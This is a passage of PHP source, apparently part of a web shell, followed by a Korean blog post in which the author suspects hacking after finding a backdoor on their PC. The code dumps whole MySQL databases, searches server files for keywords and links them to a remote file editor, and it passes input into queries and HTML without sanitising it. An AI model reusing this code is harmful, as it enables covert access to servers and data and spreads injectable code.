            if ($field['Extra'] != "") {
                $tabledump .= " $field[Extra]";
            }
        }
        mysql_free_result($fields);
    
        $keys = mysql_query("SHOW KEYS FROM $table");
        while ($key = mysql_fetch_array($keys)) {
            $kname=$key['Key_name'];
            if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
                $kname="UNIQUE|$kname";
            }
            if(!is_array($index[$kname])) {
                $index[$kname] = array();
            }
            $index[$kname][] = $key['Column_name'];
        }
        mysql_free_result($keys);

        while(list($kname, $columns) = @each($index)) {
            $tabledump .= ",\n";
            $colnames=implode($columns,",");

            if ($kname == "PRIMARY") {
                $tabledump .= "  PRIMARY KEY ($colnames)";
            } else {
                if (substr($kname,0,6) == "UNIQUE") {
                    $kname=substr($kname,7);
                }
                $tabledump .= "  KEY $kname ($colnames)";
            }
        }

        $tabledump .= "\n);\n\n";
        if ($fp) {
            fwrite($fp,$tabledump);
        } else {
            echo $tabledump;
        }

        $rows = mysql_query("SELECT * FROM $table");
        $numfields = mysql_num_fields($rows);
        while ($row = mysql_fetch_array($rows)) {
            $tabledump = "INSERT INTO $table VALUES(";

            $fieldcounter=-1;
            $firstfield=1;
            while (++$fieldcounter<$numfields) {
                if (!$firstfield) {
                    $tabledump.=", ";
                } else {
                    $firstfield=0;
                }

                if (!isset($row[$fieldcounter])) {
                    $tabledump .= "NULL";
                } else {
                    $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
                }
            }

            $tabledump .= ");\n";

            if ($fp) {
                fwrite($fp,$tabledump);
            } else {
                echo $tabledump;
            }
        }
        mysql_free_result($rows);
    }

    class FORMS {
        function tableheader() {
            echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
        }

        function headerform($arg=array()) {
            global $dir;
            if ($arg[enctype]){
                $enctype="enctype=\"$arg[enctype]\"";
            } else {
                $enctype="";
            }
            if (!isset($arg[method])) {
                $arg[method] = "POST";
            }
            if (!isset($arg[action])) {
                $arg[action] = '';
            }
            echo "  <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
            echo "  <tr>\n";
            echo "    <td>".$arg[content]."</td>\n";
            echo "  </tr>\n";
            echo "  </form>\n";
        }

        function tdheader($title) {
            global $dir;
            echo "  <tr class=\"firstalt\">\n";
            echo "    <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">럿쀼</a>]</b></td>\n";
            echo "  </tr>\n";
        }

        function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
            if ($bgcolor=='2') {
                $css="secondalt";
            } elseif ($bgcolor=='1') {
                $css="firstalt";
            } else {
                $css=$bgcolor;
            }
            $height = empty($height) ? "" : " height=".$height;
            $colspan = empty($colspan) ? "" : " colspan=".$colspan;
            echo "  <tr class=\"".$css."\">\n";
            echo "    <td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
            echo "  </tr>\n";
        }

        function tablefooter() {
            echo "</table>\n";
        }

        function formheader($action='',$title,$target='') {
            global $dir;
            $target = empty($target) ? "" : " target=\"".$target."\"";
            echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
            echo "  <tr class=\"firstalt\">\n";
            echo "    <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">럿쀼</a>]</b></td>\n";
            echo "  </tr>\n";
        }

        function makehidden($name,$value=''){
            echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
        }

        function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
            $css = ($css == 'input') ? " class=\"input\"" : "";
            $input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
            return $input;
        }

        function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
            $textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
            return $textarea;
        }

        function formfooter($over='',$height=''){
            $height = empty($height) ? "" : " height=\"".$height."\"";
            echo "  <tr class=\"secondalt\">\n";
            echo "    <td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value=\"횅땍\"></td>\n";
            echo "  </tr>\n";
            echo " </form>\n";
            echo $end = empty($over) ? "" : "</table>\n";
        }

        function makeselect($arg = array()){
            if ($arg[multiple]==1) {
                $multiple = " multiple";
                if ($arg[size]>0) {
                    $size = "size=$arg[size]";
                }
            }
            if ($arg[css]==0) {
                $css = "class=\"input\"";
            }
            $select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
                if (is_array($arg[option])) {
                    foreach ($arg[option] AS $key=>$value) {
                        if (!is_array($arg[selected])) {
                            if ($arg[selected]==$key) {
                                $select .= "<option value=\"$key\" selected>$value</option>\n";
                            } else {
                                $select .= "<option value=\"$key\">$value</option>\n";
                            }

                        } elseif (is_array($arg[selected])) {
                            if ($arg[selected][$key]==1) {
                                $select .= "<option value=\"$key\" selected>$value</option>\n";
                            } else {
                                $select .= "<option value=\"$key\">$value</option>\n";
                            }
                        }
                    }
                }
            $select .= "</select>\n";
            return $select;
        }
    }
    
    function find($path) //꿴冷밑숩늦
{
    global $oldkey,$type,$type2,$endline,$beline;
    if(is_dir("$path")){
    $tempdir=opendir("$path");
    while($f=readdir($tempdir)){ if($f=="."||$f=="..")continue;  find("$path/$f");}
    closedir($tempdir);
    }else{
    if(filesize("$path")){
    $fp=fopen("$path","r");
    $msg=fread($fp, filesize("$path"));
    fclose($fp);
if(strpos($msg, $oldkey) !== false) {
    $dir = dirname($path);
    $file = basename($path);
if($type=="list"){
    $mymsg = explode("\n",$msg);
    $long = count($mymsg);
    $tmp = explode($oldkey,$msg);
    $tmp = explode("\n",$tmp[0]);
    $first = count($tmp);
    $end = "[".$first."/".$long."]";
}
if($type2=="getpath"){
    $get = explode($oldkey,$msg);
    $get = strlen($get[0]);
    if(isset($beline)){
    $get = $get-$beline;
    }
    $getpath = htmlspecialchars(substr($msg, $get, $endline));
    $getpath = "title = \"".$getpath."\"";
}
echo "<span class=\"redfont\" $getpath>冷돕:$dir/$file</span> |<a href=\"?action=editfile&dir=$dir&editfile=$file\" target=\"_blank\">view+edit</a> | $end <br>";
}
                              }
                        }                   
}
?>

 

한국어가 외계어로 변했다.

2008.7.23  일자 싸이월드 미니홈피에 있는 자료중 하나다.

 

이 문서 글보면

전문가가 아닌 일반인들이 해킹을 안다고?

 

세상에 어느 바보 멍청이가 그러더냐???

 

 

내가 말하길
내 개인 PC에  백도어 전혀 설치한 적도 없는데  
 
내  개인 PC에
백도어 열린게 왜? 존재해 있냐는 거였다.
ㅡㅡ;;;
그렇게 되니까 해킹을 상당히 의심하게
되지. 
 
내 스스로 백도어는 열어 놓은 적 없으니까.
누군가 침범했다는 거지..